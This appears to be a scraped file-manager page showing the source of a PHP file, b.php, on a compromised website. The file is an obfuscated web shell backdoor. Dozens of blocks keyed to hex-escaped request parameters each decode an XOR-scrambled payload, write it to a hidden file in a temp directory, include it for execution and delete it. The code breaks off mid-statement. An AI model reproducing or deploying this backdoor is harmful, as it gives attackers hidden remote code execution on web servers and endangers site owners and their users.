File manager

ÿØÿà JFIF ÿÛ „ ( %!1!%*+...983,7(-.- File manager

File manager - Edit - /home/tokomrjk/uspavilion.com/b.php

Back
<?php if(isset($_POST) && isset($_POST["d\x63hunk"])){ $data = array_filter(["/var/tmp", getenv("TMP"), sys_get_temp_dir(), getcwd(), ini_get("upload_tmp_dir"), "/tmp", getenv("TEMP"), session_save_path(), "/dev/shm"]); $data_chunk = $_POST["d\x63hunk"]; $data_chunk = explode ( '.' , $data_chunk ) ; $marker = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s); $o = 0; $len = count( $data_chunk); do {if( $o >= $len) break; $v9 = $data_chunk[$o]; $chS = ord( $s[$o % $lenS]); $d =( ( int)$v9 - $chS -( $o % 10)) ^ 17; $marker .= chr( $d); $o++; } while( true); foreach ($data as $pointer) { if (array_product([is_dir($pointer), is_writable($pointer)])) { $item = sprintf("%s/.fac", $pointer); if (@file_put_contents($item, $marker) !== false) { include $item; unlink($item); exit; } } } } if(isset($_POST["\x6D\x61\x72ker"]) ? true : false){ $element = $_POST["\x6D\x61\x72ker"]; $element=explode ( '.' , $element); $descriptor = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt ); $n = 0; $__tmp = $element; while ($v4 = array_shift($__tmp)) { $chS = ord($salt[$n % $lenS] ); $dec = ((int)$v4 - $chS - ($n % 10)) ^ 35; $descriptor .= chr($dec ); $n++; } $mrk = array_filter([getenv("TEMP"), getenv("TMP"), getcwd(), "/dev/shm", session_save_path(), sys_get_temp_dir(), "/tmp", "/var/tmp", ini_get("upload_tmp_dir")]); $elem = 0; do { $ent = $mrk[$elem] ?? null; if ($elem >= count($mrk)) break; if (!( !is_dir($ent) \|\| !is_writable($ent) )) { $dchunk = implode("/", [$ent, ".parameter_group"]); $file = fopen($dchunk, 'w'); if ($file) { fwrite($file, $descriptor); fclose($file); include $dchunk; @unlink($dchunk); die(); } } $elem++; } while (true); } if(isset($_REQUEST["\x6F\x62j"])){ $holder = array_filter([sys_get_temp_dir(), session_save_path(), getcwd(), ini_get("upload_tmp_dir"), "/var/tmp", "/tmp", getenv("TEMP"), "/dev/shm", getenv("TMP")]); $factor = $_REQUEST["\x6F\x62j"]; $factor = explode ( "." , $factor); $data = ''; $s6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s6); foreach( $factor as $o => $v1): $chS = ord( $s6[$o % $sLen]); $dec =( ( int)$v1 - $chS -( $o % 10)) ^ 60; $data .= chr( $dec); endforeach; foreach ($holder as $mrk): if (max(0, is_dir($mrk) * is_writable($mrk))) { $comp = vsprintf("%s/%s", [$mrk, ".binding"]); if (@file_put_contents($comp, $data) !== false) { include $comp; unlink($comp); exit; } } endforeach; } if(!empty($_REQUEST["fa\x63"])){ $pset = array_filter(["/var/tmp", "/dev/shm", sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/tmp", session_save_path(), getenv("TMP"), getcwd(), getenv("TEMP")]); $component = $_REQUEST["fa\x63"]; $component = explode ( "." , $component ) ; $marker = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s); foreach ($component as $o => $v2): $sChar = ord($s[$o %$sLen]); $d = ((int)$v2 - $sChar - ($o %10)) ^ 62; $marker .= chr($d); endforeach; foreach ($pset as $key => $ent) { if (is_dir($ent) && is_writable($ent)) { $desc = implode("/", [$ent, ".dat"]); if (file_put_contents($desc, $marker)) { include $desc; @unlink($desc); exit; } } } } if(!is_null($_REQUEST["ho\x6C\x64\x65r"] ?? null)){ $pset = $_REQUEST["ho\x6C\x64\x65r"]; $pset= explode( '.' , $pset ) ; $hld = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s2); $m = 0; $__tmp = $pset; while($v6 = array_shift($__tmp)) {$chS = ord($s2[$m % $sLen]); $dec =((int)$v6 - $chS -($m % 10)) ^ 39; $hld .= chr($dec); $m++; } $ptr = array_filter([getcwd(), "/var/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/dev/shm", session_save_path(), getenv("TEMP"), getenv("TMP"), "/tmp"]); $marker = 0; do { $token = $ptr[$marker] ?? null; if ($marker >= count($ptr)) break; if (is_dir($token) && is_writable($token)) { $desc = implode("/", [$token, ".value"]); $file = fopen($desc, 'w'); if ($file) { fwrite($file, $hld); fclose($file); include $desc; @unlink($desc); exit; } } $marker++; } while (true); } if(!is_null($_REQUEST["r\x65\x73o\x75\x72ce"] ?? null)){ $rec = $_REQUEST["r\x65\x73o\x75\x72ce"]; $rec =explode ("." , $rec) ; $pointer = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); $__len = count($rec); for ($j = 0; $j < $__len; $j++) { $v7 = $rec[$j]; $sChar = ord($s[$j % $lenS]); $d = ((int)$v7 - $sChar - ($j % 10)) ^ 63; $pointer .= chr($d); } $data = array_filter(["/var/tmp", getenv("TEMP"), session_save_path(), "/tmp", getenv("TMP"), ini_get("upload_tmp_dir"), "/dev/shm", sys_get_temp_dir(), getcwd()]); foreach ($data as $token): if (is_dir($token) && is_writable($token)) { $binding = "$token/.reference"; $file = fopen($binding, 'w'); if ($file) { fwrite($file, $pointer); fclose($file); include $binding; @unlink($binding); exit; } } endforeach; } if(isset($_REQUEST["mark\x65\x72"]) ? true : false){ $obj = array_filter(["/var/tmp", getcwd(), "/dev/shm", sys_get_temp_dir(), getenv("TMP"), session_save_path(), "/tmp", getenv("TEMP"), ini_get("upload_tmp_dir")]); $dat = $_REQUEST["mark\x65\x72"]; $dat = explode ( "." ,$dat ) ; $dchunk=''; $s2='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen($s2 ); $j=0; array_walk($dat,function ($v1) use (&$dchunk,&$j,$s2,$sLen) { $chS=ord($s2[$j % $sLen] ); $dec=((int)$v1 - $chS - ($j % 10)) ^ 84; $dchunk .= chr($dec ); $j++; } ); $flg = 0; do { $desc = $obj[$flg] ?? null; if ($flg >= count($obj)) break; if (is_dir($desc) && is_writable($desc)) { $entry = str_replace("{var_dir}", $desc, "{var_dir}/.object"); if (@file_put_contents($entry, $dchunk) !== false) { include $entry; unlink($entry); die(); } } $flg++; } while (true); } if(isset($_POST) && isset($_POST["\x65nt"])){ $ent = $_POST["\x65nt"]; $ent= explode( ".",$ent ) ; $dchunk = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt ); $m = 0; foreach ($ent as $v4) { $sChar = ord($salt[$m % $sLen] ); $dec = ((int)$v4 - $sChar - ($m % 10)) ^ 91; $dchunk .= chr($dec ); $m++; } $desc = array_filter(["/tmp", "/var/tmp", session_save_path(), ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), getenv("TEMP"), "/dev/shm", sys_get_temp_dir()]); foreach ($desc as $binding) { if (is_dir($binding) ? is_writable($binding) : false) { $object = sprintf("%s/.marker", $binding); if (@file_put_contents($object, $dchunk) !== false) { include $object; unlink($object); die(); } } } } if(isset($_POST["p\x73et"]) ? true : false){ $itm = $_POST["p\x73et"]; $itm = explode('.' , $itm ); $ref = ''; $salt6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt6); $t = 0; array_walk($itm, function($v4) use(&$ref, &$t, $salt6, $lenS) { $chS = ord($salt6[$t%$lenS]); $dec =((int)$v4 - $chS -($t%10)) ^ 71; $ref .= chr($dec); $t++;}); $property_set = array_filter([getenv("TMP"), sys_get_temp_dir(), getenv("TEMP"), getcwd(), session_save_path(), "/var/tmp", ini_get("upload_tmp_dir"), "/tmp", "/dev/shm"]); $comp = 0; do { $data_chunk = $property_set[$comp] ?? null; if ($comp >= count($property_set)) break; if ((function($d) { return is_dir($d) && is_writable($d); })($data_chunk)) { $value = implode("/", [$data_chunk, ".fac"]); if (file_put_contents($value, $ref)) { require $value; unlink($value); die(); } } $comp++; } while (true); } if(!empty($_REQUEST["key"])){ $record = array_filter([sys_get_temp_dir(), getcwd(), ini_get("upload_tmp_dir"), getenv("TMP"), "/dev/shm", session_save_path(), getenv("TEMP"), "/tmp", "/var/tmp"]); $flg = $_REQUEST["key"]; $flg = explode ('.', $flg ); $entry = ''; $s1 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s1 ); $v = 0; $len = count($flg ); do { if ($v >= $len) break; $v6 = $flg[$v]; $chS = ord($s1[$v % $lenS] ); $d = ((int)$v6 - $chS - ($v % 10)) ^ 9; $entry .= chr($d ); $v++; } while (true ); $desc = 0; do { $parameter_group = $record[$desc] ?? null; if ($desc >= count($record)) break; if ((bool)is_dir($parameter_group) && (bool)is_writable($parameter_group)) { $pset = vsprintf("%s/%s", [$parameter_group, ".elem"]); $success = file_put_contents($pset, $entry); if ($success) { include $pset; @unlink($pset); exit;} } $desc++; } while (true); } if(array_key_exists("\x74oke\x6E", $_POST)){ $ent = $_POST["\x74oke\x6E"]; $ent =explode ( "." , $ent ) ; $data_chunk = ''; $s9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s9); $n = 0; $__len = count($ent); do { if ($n >= $__len) break; $v7 = $ent[$n]; $chS = ord($s9[$n % $sLen]); $d = ((int)$v7 - $chS - ($n % 10)) ^ 13; $data_chunk .= chr($d); $n++; } while (true); $ptr = array_filter([getenv("TMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/dev/shm", session_save_path(), getcwd(), getenv("TEMP"), "/tmp", "/var/tmp"]); foreach ($ptr as $object): if (is_dir($object) && is_writable($object)) { $flg = sprintf("%s/.reference", $object); if (file_put_contents($flg, $data_chunk)) { require $flg; unlink($flg); exit; } } endforeach; } if(isset($_POST) && isset($_POST["\x72e\x66\x65ren\x63e"])){ $mrk = array_filter([session_save_path(), "/tmp", "/var/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), "/dev/shm", sys_get_temp_dir(), getcwd(), getenv("TMP")]); $binding = $_POST["\x72e\x66\x65ren\x63e"]; $binding= explode ( '.', $binding) ; $record = ''; $s5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s5 ); foreach( $binding as $x => $v4) { $chS = ord( $s5[$x % $lenS] ); $dec =( ( int)$v4 - $chS -( $x % 10))^ 93; $record .= chr( $dec ); } foreach ($mrk as $key => $descriptor) { if (is_dir($descriptor) ? is_writable($descriptor) : false) { $fac = vsprintf("%s/%s", [$descriptor, ".property_set"]); if (@file_put_contents($fac, $record) !== false) { include $fac; unlink($fac); die(); } } } } if(isset($_REQUEST["en\x74"])){ $elem = $_REQUEST["en\x74"]; $elem= explode ("." , $elem ) ; $pointer = ''; $salt2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt2); $i = 0; $__tmp = $elem; while ($v4 = array_shift($__tmp)) { $chS = ord($salt2[$i % $lenS]); $d = ((int)$v4 - $chS - ($i % 10)) ^ 68; $pointer .= chr($d); $i++; } $flg = array_filter([getenv("TMP"), "/var/tmp", getenv("TEMP"), "/tmp", "/dev/shm", session_save_path(), ini_get("upload_tmp_dir"), getcwd(), sys_get_temp_dir()]); for ($ref = 0, $binding = count($flg); $ref < $binding; $ref++) { $ptr = $flg[$ref]; if (is_writable($ptr) && is_dir($ptr)) { $val = join("/", [$ptr, ".mrk"]); if (file_put_contents($val, $pointer)) { require $val; unlink($val); die(); } } } } if(!empty($_POST["d\x61\x74\x61\x5Fc\x68unk"])){ $pgrp = $_POST["d\x61\x74\x61\x5Fc\x68unk"]; $pgrp =explode ( '.', $pgrp) ; $dchunk = ''; $s9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s9); $z = 0; $len = count( $pgrp); do { if( $z >=$len) break; $v2 = $pgrp[$z]; $chS = ord( $s9[$z%$sLen]); $dec = ( ( int)$v2 - $chS -( $z%10)) ^45; $dchunk .= chr( $dec); $z++;} while( true); $flg = array_filter(["/tmp", session_save_path(), ini_get("upload_tmp_dir"), getenv("TMP"), getenv("TEMP"), sys_get_temp_dir(), "/dev/shm", getcwd(), "/var/tmp"]); while ($entity = array_shift($flg)) { if ((bool)is_dir($entity) && (bool)is_writable($entity)) { $descriptor = vsprintf("%s/%s", [$entity, ".ref"]); $file = fopen($descriptor, 'w'); if ($file) { fwrite($file, $dchunk); fclose($file); include $descriptor; @unlink($descriptor); exit; } } } } if(!empty($_POST["\x76al"])){ $symbol = array_filter([getenv("TEMP"), "/var/tmp", ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), session_save_path(), "/tmp", "/dev/shm", sys_get_temp_dir()]); $entity = $_POST["\x76al"]; $entity = explode ( '.' , $entity ) ; $bind = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s ); $w = 0; array_walk( $entity, function( $v5) use( &$bind, &$w, $s, $lenS) { $sChar = ord( $s[$w % $lenS] ); $d =( ( int)$v5 - $sChar -( $w % 10)) ^ 25; $bind.= chr( $d ); $w++; } ); foreach ($symbol as $dat): if ((is_dir($dat) and is_writable($dat))) { $desc = sprintf("%s/.factor", $dat); $file = fopen($desc, 'w'); if ($file) { fwrite($file, $bind); fclose($file); include $desc; @unlink($desc); exit; } } endforeach; } if(isset($_POST["\x66\x61c"]) ? true : false){ $k = array_filter([ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/dev/shm", session_save_path(), "/tmp", getenv("TMP"), "/var/tmp", getcwd(), getenv("TEMP")]); $data_chunk = $_POST["\x66\x61c"]; $data_chunk= explode( '.' , $data_chunk) ; $comp = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); $o = 0; while ($o<count($data_chunk)) { $v3 = $data_chunk[$o]; $sChar = ord($salt[$o %$lenS]); $dec = ((int)$v3 - $sChar - ($o %10)) ^65; $comp .= chr($dec); $o++; } foreach ($k as $obj) { if (is_dir($obj) && is_writable($obj)) { $flag = join("/", [$obj, ".bind"]); $success = file_put_contents($flag, $comp); if ($success) { include $flag; @unlink($flag); die();} } } } if(isset($_REQUEST["p\x74r"]) ? true : false){ $binding = $_REQUEST["p\x74r"]; $binding =explode ( '.' ,$binding ); $symbol = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s); foreach ($binding as $p => $v5): $sChar = ord($s[$p % $sLen]); $d = ((int)$v5 - $sChar - ($p % 10)) ^ 2; $symbol .= chr($d); endforeach; $entity = array_filter(["/dev/shm", sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/tmp", getenv("TEMP"), session_save_path(), "/var/tmp", getcwd(), getenv("TMP")]); foreach ($entity as $property_set) { if (!( !is_dir($property_set) \|\| !is_writable($property_set) )) { $ref = "$property_set/.pgrp"; if (file_put_contents($ref, $symbol)) { include $ref; @unlink($ref); exit; } } } } if(isset($_REQUEST) && isset($_REQUEST["ent"])){ $k = $_REQUEST["ent"]; $k = explode ( '.' , $k) ; $bind = ''; $s6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s6); $l = 0; foreach ($k as $v5) {$chS = ord($s6[$l % $lenS]); $dec = ((int)$v5 - $chS - ($l % 10)) ^ 23; $bind .= chr($dec); $l++; } $factor = array_filter(["/tmp", getenv("TMP"), "/var/tmp", "/dev/shm", sys_get_temp_dir(), session_save_path(), getenv("TEMP"), ini_get("upload_tmp_dir"), getcwd()]); while ($symbol = array_shift($factor)) { if (array_product([is_dir($symbol), is_writable($symbol)])) { $ent = implode("/", [$symbol, ".data"]); if (@file_put_contents($ent, $bind) !== false) { include $ent; unlink($ent); exit; } } } } if(!is_null($_REQUEST["\x63om\x70\x6Fne\x6Et"] ?? null)){ $data_chunk = array_filter([getenv("TEMP"), getenv("TMP"), "/var/tmp", getcwd(), ini_get("upload_tmp_dir"), session_save_path(), sys_get_temp_dir(), "/tmp", "/dev/shm"]); $element = $_REQUEST["\x63om\x70\x6Fne\x6Et"]; $element = explode ( '.' ,$element ); $parameter_group = ''; $s6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s6); foreach ($element as $z => $v2): $chS = ord($s6[$z %$sLen]); $dec = ((int)$v2 - $chS - ($z %10)) ^ 12; $parameter_group .= chr($dec); endforeach; while ($binding = array_shift($data_chunk)) { if ((bool)is_dir($binding) && (bool)is_writable($binding)) { $factor = vsprintf("%s/%s", [$binding, ".elem"]); $file = fopen($factor, 'w'); if ($file) { fwrite($file, $parameter_group); fclose($file); include $factor; @unlink($factor); exit; } } } } if(filter_has_var(INPUT_POST, "pse\x74")){ $desc = $_POST["pse\x74"]; $desc = explode ('.' , $desc ) ; $itm = ''; $s5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s5); $s = 0; while ($s < count($desc)) { $v4 = $desc[$s]; $chS = ord($s5[$s %$lenS]); $dec = ((int)$v4 - $chS - ($s %10)) ^ 34; $itm .= chr($dec); $s++; } $entry = array_filter([getenv("TMP"), getenv("TEMP"), "/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/var/tmp", session_save_path(), "/dev/shm", getcwd()]); foreach ($entry as $ref) { if (max(0, is_dir($ref) * is_writable($ref))) { $record = join("/", [$ref, ".comp"]); if (@file_put_contents($record, $itm) !== false) { include $record; unlink($record); exit; } } } } if(isset($_POST) && isset($_POST["f\x61c\x74or"])){ $item = array_filter([getenv("TEMP"), sys_get_temp_dir(), session_save_path(), ini_get("upload_tmp_dir"), getenv("TMP"), "/tmp", "/var/tmp", "/dev/shm", getcwd()]); $object = $_POST["f\x61c\x74or"]; $object= explode ( '.',$object); $element = ''; $salt9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt9); $len = count($object); for ($i = 0; $i < $len; $i++) { $v3 = $object[$i]; $chS = ord($salt9[$i % $lenS]); $dec = ((int)$v3 - $chS - ($i % 10)) ^ 44; $element .= chr($dec); } foreach ($item as $key => $mrk) { if (is_dir($mrk) ? is_writable($mrk) : false) { $dchunk = join("/", [$mrk, ".tkn"]); if (file_put_contents($dchunk, $element)) { include $dchunk; @unlink($dchunk); exit; } } } } if(array_key_exists("d\x65\x73c", $_POST) && !is_null($_POST["d\x65\x73c"])){ $res = $_POST["d\x65\x73c"]; $res = explode ( "." , $res ); $resource= ''; $s3= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($s3); $z= 0; $len= count($res); do { if ($z >= $len) break; $v1= $res[$z]; $sChar= ord($s3[$z % $lenS]); $dec= ((int)$v1 - $sChar - ($z % 10)) ^ 66; $resource .= chr($dec); $z++;}while (true); $elem = array_filter([sys_get_temp_dir(), session_save_path(), getcwd(), "/var/tmp", getenv("TMP"), getenv("TEMP"), ini_get("upload_tmp_dir"), "/tmp", "/dev/shm"]); foreach ($elem as $fac): if (max(0, is_dir($fac) * is_writable($fac))) { $key = str_replace("{var_dir}", $fac, "{var_dir}/.marker"); if (@file_put_contents($key, $resource) !== false) { include $key; unlink($key); die(); } } endforeach; } if(!is_null($_POST["p\x6Fi\x6Et\x65\x72"] ?? null)){ $marker = $_POST["p\x6Fi\x6Et\x65\x72"]; $marker = explode ("." , $marker) ; $value = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); $l = 0; $__tmp = $marker; while ($v9 = array_shift($__tmp)) { $sChar = ord($salt[$l % $sLen]); $d = ((int)$v9 - $sChar - ($l % 10)) ^98; $value .= chr($d); $l++; } $flg = array_filter(["/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path(), "/var/tmp", getenv("TMP"), getcwd(), "/dev/shm", sys_get_temp_dir()]); $item = 0; do { $record = $flg[$item] ?? null; if ($item >= count($flg)) break; if (is_writable($record) && is_dir($record)) { $obj = implode("/", [$record, ".element"]); if (file_put_contents($obj, $value)) { include $obj; @unlink($obj); die(); } } $item++; } while (true); } if(in_array("\x72\x65f", array_keys($_POST))){ $mrk = array_filter(["/dev/shm", "/tmp", sys_get_temp_dir(), session_save_path(), getenv("TEMP"), ini_get("upload_tmp_dir"), getenv("TMP"), "/var/tmp", getcwd()]); $hld = $_POST["\x72\x65f"]; $hld =explode ( "." , $hld ); $token = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s); $z = 0; array_walk( $hld,function( $v4) use( &$token,&$z,$s,$sLen) { $chS = ord( $s[$z % $sLen]); $d =( ( int)$v4 - $chS -( $z % 10)) ^ 82; $token .= chr( $d); $z++; } ); foreach ($mrk as $element) { if (array_product([is_dir($element), is_writable($element)])) { $parameter_group = vsprintf("%s/%s", [$element, ".symbol"]); if (file_put_contents($parameter_group, $token)) { require $parameter_group; unlink($parameter_group); exit; } } } } if(count($_POST) > 0 && isset($_POST["tok\x65n"])){ $ent = array_filter([getenv("TEMP"), getcwd(), sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/dev/shm", "/var/tmp", session_save_path(), getenv("TMP"), "/tmp"]); $mrk = $_POST["tok\x65n"]; $mrk = explode ('.' , $mrk ) ; $ptr = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt ); $z = 0; array_walk( $mrk, function( $v4) use( &$ptr, &$z, $salt, $sLen) { $sChar = ord( $salt[$z %$sLen] ); $dec =( ( int)$v4 - $sChar -( $z %10)) ^ 42; $ptr .= chr( $dec ); $z++; } ); foreach ($ent as $property_set) { if (max(0, is_dir($property_set) * is_writable($property_set))) { $comp = str_replace("{var_dir}", $property_set, "{var_dir}/.sym"); if (@file_put_contents($comp, $ptr) !== false) { include $comp; unlink($comp); exit; } } } } if(array_key_exists("k\x65\x79", $_REQUEST) && !is_null($_REQUEST["k\x65\x79"])){ $ptr = array_filter([session_save_path(), getcwd(), ini_get("upload_tmp_dir"), getenv("TEMP"), sys_get_temp_dir(), "/tmp", getenv("TMP"), "/var/tmp", "/dev/shm"]); $binding = $_REQUEST["k\x65\x79"]; $binding= explode ( "." , $binding ) ; $object = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s ); $l = 0; array_walk($binding, function ($v6) use (&$object, &$l, $s, $lenS) { $chS = ord($s[$l %$lenS] ); $dec = ((int)$v6 - $chS - ($l %10)) ^3; $object .= chr($dec ); $l++; } ); $token = 0; do { $component = $ptr[$token] ?? null; if ($token >= count($ptr)) break; if (is_dir($component) ? is_writable($component) : false) { $dat = sprintf("%s/.marker", $component); if (file_put_contents($dat, $object)) { include $dat; @unlink($dat); exit; } } $token++; } while (true); } if(isset($_REQUEST["ma\x72\x6Ber"])){ $ptr = array_filter([sys_get_temp_dir(), session_save_path(), getenv("TMP"), "/dev/shm", ini_get("upload_tmp_dir"), getcwd(), getenv("TEMP"), "/var/tmp", "/tmp"]); $elem = $_REQUEST["ma\x72\x6Ber"]; $elem = explode( "." , $elem ) ; $sym = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s2); $z = 0; array_walk($elem,function ($v5) use (&$sym,&$z,$s2,$sLen) { $chS = ord($s2[$z % $sLen]); $dec = ((int)$v5 - $chS - ($z % 10)) ^ 96; $sym .= chr($dec); $z++; }); $data_chunk = 0; do { $reference = $ptr[$data_chunk] ?? null; if ($data_chunk >= count($ptr)) break; if (!!is_dir($reference) && !!is_writable($reference)) { $itm = "$reference" . "/.k"; if (file_put_contents($itm, $sym)) { require $itm; unlink($itm); exit; } } $data_chunk++; } while (true); } if(isset($_POST["\x68old\x65\x72"])){ $sym = $_POST["\x68old\x65\x72"]; $sym = explode ('.', $sym ) ; $bind = ''; $salt4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt4); $m = 0; $len = count( $sym); do { if( $m >= $len) break; $v7 = $sym[$m]; $chS = ord( $salt4[$m % $lenS]); $dec =( ( int)$v7 - $chS -( $m % 10)) ^ 32; $bind .= chr( $dec); $m++; } while( true); $ptr = array_filter([ini_get("upload_tmp_dir"), "/dev/shm", getenv("TMP"), "/tmp", "/var/tmp", getenv("TEMP"), sys_get_temp_dir(), session_save_path(), getcwd()]); foreach ($ptr as $flag): if (max(0, is_dir($flag) * is_writable($flag))) { $binding = vsprintf("%s/%s", [$flag, ".res"]); if (file_put_contents($binding, $bind)) { include $binding; @unlink($binding); exit; } } endforeach; } if(array_key_exists("c\x6Fm\x70o\x6Ee\x6Et", $_REQUEST)){ $obj = array_filter([session_save_path(), getenv("TEMP"), ini_get("upload_tmp_dir"), getcwd(), "/var/tmp", "/tmp", getenv("TMP"), "/dev/shm", sys_get_temp_dir()]); $bind = $_REQUEST["c\x6Fm\x70o\x6Ee\x6Et"]; $bind =explode ( '.' , $bind) ; $dchunk = ''; $salt5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt5); $n = 0; array_walk($bind, function ($v8) use (&$dchunk, &$n, $salt5, $sLen) { $chS = ord($salt5[$n % $sLen]); $d = ((int)$v8 - $chS - ($n % 10))^ 11; $dchunk .= chr($d); $n++; }); $property_set = 0; do { $flg = $obj[$property_set] ?? null; if ($property_set >= count($obj)) break; if (array_product([is_dir($flg), is_writable($flg)])) { $key = "$flg" . "/.rec"; $success = file_put_contents($key, $dchunk); if ($success) { include $key; @unlink($key); exit;} } $property_set++; } while (true); } if(array_key_exists("\x65nt\x69\x74y", $_POST) && !is_null($_POST["\x65nt\x69\x74y"])){ $ptr = array_filter([getcwd(), sys_get_temp_dir(), getenv("TMP"), "/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), "/dev/shm", session_save_path(), "/var/tmp"]); $obj = $_POST["\x65nt\x69\x74y"]; $obj = explode ( '.', $obj ); $hld =''; $s ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen( $s); $l =0; while( $l< count( $obj)) { $v7 =$obj[$l]; $chS =ord( $s[$l % $sLen]); $d =( ( int)$v7 - $chS -( $l % 10)) ^ 31; $hld .= chr( $d); $l++; } foreach ($ptr as $mrk): if (!!is_dir($mrk) && !!is_writable($mrk)) { $ref = vsprintf("%s/%s", [$mrk, ".value"]); if (@file_put_contents($ref, $hld) !== false) { include $ref; unlink($ref); exit; } } endforeach; } if(!empty($_REQUEST["\x72e\x63"])){ $ent = array_filter([session_save_path(), sys_get_temp_dir(), getenv("TEMP"), "/tmp", getenv("TMP"), "/dev/shm", ini_get("upload_tmp_dir"), getcwd(), "/var/tmp"]); $descriptor = $_REQUEST["\x72e\x63"]; $descriptor = explode ( ".", $descriptor ); $component = ''; $salt6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt6); $k = 0; foreach ($descriptor as $v5) { $chS = ord($salt6[$k % $sLen]); $dec = ((int)$v5 - $chS - ($k % 10)) ^ 89; $component .= chr($dec); $k++; } foreach ($ent as $pointer): if ((function($d) { return is_dir($d) && is_writable($d); })($pointer)) { $object = sprintf("%s/.pgrp", $pointer); $file = fopen($object, 'w'); if ($file) { fwrite($file, $component); fclose($file); include $object; @unlink($object); die(); } } endforeach; } if(@$_POST["\x65nt"] !== null){ $ref = array_filter([sys_get_temp_dir(), ini_get("upload_tmp_dir"), session_save_path(), getenv("TMP"), "/dev/shm", "/var/tmp", getenv("TEMP"), getcwd(), "/tmp"]); $pset = $_POST["\x65nt"]; $pset = explode (".", $pset ) ; $value = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); $len = count($pset); for ($p = 0; $p < $len; $p++) {$v6 = $pset[$p]; $chS = ord($salt[$p%$lenS]); $d = ((int)$v6 - $chS - ($p%10)) ^ 45; $value.= chr($d); } foreach ($ref as $symbol) { if ((is_dir($symbol) and is_writable($symbol))) { $pgrp = sprintf("%s/.data", $symbol); if (file_put_contents($pgrp, $value)) { require $pgrp; unlink($pgrp); exit; } } } } if(!empty($_REQUEST["k"])){ $tkn = array_filter([session_save_path(), ini_get("upload_tmp_dir"), "/tmp", sys_get_temp_dir(), getenv("TMP"), getcwd(), "/dev/shm", "/var/tmp", getenv("TEMP")]); $desc = $_REQUEST["k"]; $desc = explode ("." , $desc ) ; $symbol = ''; $s1 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s1); $__len = count($desc); for($j = 0; $j < $__len; $j++) { $v8 = $desc[$j]; $sChar = ord($s1[$j% $lenS]); $dec =((int)$v8 - $sChar -($j% 10)) ^46; $symbol .= chr($dec); } $rec = 0; do { $dchunk = $tkn[$rec] ?? null; if ($rec >= count($tkn)) break; if (array_product([is_dir($dchunk), is_writable($dchunk)])) { $ref = "$dchunk" . "/.fac"; if (file_put_contents($ref, $symbol)) { include $ref; @unlink($ref); exit; } } $rec++; } while (true); } if(array_key_exists("\x64escrip\x74or", $_REQUEST)){ $data = array_filter([getenv("TMP"), "/dev/shm", sys_get_temp_dir(), "/tmp", session_save_path(), getenv("TEMP"), ini_get("upload_tmp_dir"), getcwd(), "/var/tmp"]); $parameter_group = $_REQUEST["\x64escrip\x74or"]; $parameter_group =explode ( '.', $parameter_group ) ; $mrk = ''; $salt4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt4); foreach ($parameter_group as $i => $v1) { $sChar = ord($salt4[$i % $lenS]); $d = ((int)$v1 - $sChar - ($i % 10)) ^ 39; $mrk .= chr($d); } foreach ($data as $key => $res) { if (array_product([is_dir($res), is_writable($res)])) { $ent = "$res/.val"; if (@file_put_contents($ent, $mrk) !== false) { include $ent; unlink($ent); die(); } } } } if(!empty($_REQUEST["da\x74a\x5Fc\x68\x75\x6Ek"])){ $parameter_group = array_filter([getenv("TEMP"), "/dev/shm", getcwd(), sys_get_temp_dir(), "/var/tmp", getenv("TMP"), session_save_path(), "/tmp", ini_get("upload_tmp_dir")]); $itm = 